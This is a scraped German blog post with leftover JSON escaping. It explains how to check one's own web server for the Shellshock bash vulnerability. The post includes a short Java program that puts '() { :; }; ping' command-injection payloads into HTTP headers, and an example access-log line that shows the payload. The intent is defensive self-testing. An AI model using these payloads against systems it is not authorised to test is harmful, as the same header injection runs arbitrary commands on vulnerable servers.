Seit kurzer Zeit ist eine neue, wirklich schwerwiegende Sicherheitsl\u00fccke bekannt geworden: Shellshock. Nachzulesen hier:<\/p>\n
http:\/\/www.heise.de\/newsticker\/meldung\/Bash-Luecke-ShellShock-ist-noch-nicht-ausgestanden-2403607.html<\/a><\/p>\n http:\/\/www.golem.de\/news\/bash-luecke-die-hintergruende-zu-shellshock-1409-109463.html<\/a><\/p>\n Da immer mehr Eigenheime \u00fcber Remote-Zugriffe verf\u00fcgen und diese per HTTP zu erreichen sind, stellt sich unweigerlich die Frage: Ist mein System sicher? Wie teste ich das?<\/p>\n Wer mit Java vertraut ist kann dieses Beispiel hier benutzen (gibt sicher noch andere Wege):<\/p>\n Ersetze „<zutestenderserver>“ mit dem Namen des Zielsystems.<\/p>\n Damit Du Deinen eigenen Test in den Logfiles identifizieren kannst, ersetze noch „<deinname>“ durch Deinen Namen.<\/p>\n Um zu sehen ob das Zielsystem anf\u00e4llig ist, wird versucht ein Ping auf ein anderes System auszuf\u00fchren. Hier solltest du „<serverf\u00fcrpingfeedback>“ mit einem<\/p>\n ersetzt werden.<\/p>\n Code \u00fcbersetzen, ausf\u00fchren und gleichzeitig die Webserver Accesslog-Datei im Auge behalten, sowie auf dem „<serverf\u00fcrpingfeedback>“ System ein Netzwerktrace auf ICMP Ebene durchf\u00fchren (wireshark, tcpdump, …).<\/p>\n Im Webserver-Logile wirst du nun den HTTP Request sehen. Sieht bei mir z.B. so aus:<\/p>\n 1.2.3.4 ist das zu testende System, und 4.3.2.1 ist das System f\u00fcr die Ping-R\u00fcckmeldung.<\/p>\n Wenn im Netzwerktrace dann ein ICMP Request von 1.2.3.4 auftaucht, dann ist das System \u00fcber Apache anf\u00e4llig. Ist das nicht der Fall, bist du erstmal fein raus.<\/p>\n Debian und Ubuntu nutzen \u00fcbrigens nicht Bash, sondern Dash per Default. Das macht die Sache „etwas“ sicherer. Aber eben nicht „ganz sicher“.<\/p>\n Nichts desto trotz: Sicherstellen dass alle verf\u00fcgbaren Updates eingespielt wurden….<\/p>\n","protected":false},"excerpt":{"rendered":" Seit kurzer Zeit ist eine neue, wirklich schwerwiegende Sicherheitsl\u00fccke bekannt geworden: Shellshock. Nachzulesen hier: http:\/\/www.heise.de\/newsticker\/meldung\/Bash-Luecke-ShellShock-ist-noch-nicht-ausgestanden-2403607.html http:\/\/www.golem.de\/news\/bash-luecke-die-hintergruende-zu-shellshock-1409-109463.html Da immer mehr Eigenheime \u00fcber Remote-Zugriffe verf\u00fcgen und diese per HTTP zu erreichen sind, stellt sich unweigerlich die Frage: Ist mein System sicher? Wie … Weiterlesen import java.io.BufferedReader;\r\nimport java.io.InputStreamReader;\r\nimport java.net.URL;\r\nimport java.net.URLConnection; \r\n\r\npublic class ShellShockTest {\r\n \r\n public static void main(String[] args) throws Exception {\r\n URL url = new URL(\"http:\/\/<zutestenderserver>\");\r\n URLConnection conn = url.openConnection();\r\n conn.setRequestProperty(\"User-Agent\", \"shellshock-scan (<deinname>)\");\r\n conn.setRequestProperty(\"banners\", \"true\");\r\n conn.setRequestProperty(\"Cookie\", \"() { :; }; ping -1 3 <serverf\u00fcrpingfeedback>\");\r\n conn.setRequestProperty(\"Host\", \"() { :; }; ping -c 1 <serverf\u00fcrpingfeedback>\");\r\n conn.setRequestProperty(\"Referer\", \"() { :; }; ping -c 1 <serverf\u00fcrpingfeedback>\");\r\n BufferedReader in = new BufferedReader(new InputStreamReader(conn.getInputStream()));\r\n String inputLine;\r\n while ((inputLine = in.readLine()) != null)\r\n System.out.println(inputLine);\r\n in.close();\r\n }\r\n \r\n}<\/pre>\n\n
1.2.3.4\u00a0- - [26\/Sep\/2014:10:20:56 +0200] \"GET \/ HTTP\/1.1\" 200 467 \"() { :; }; ping -c 3 4.3.2.1\" \"shellshock-scan (huhu)\"<\/pre>\n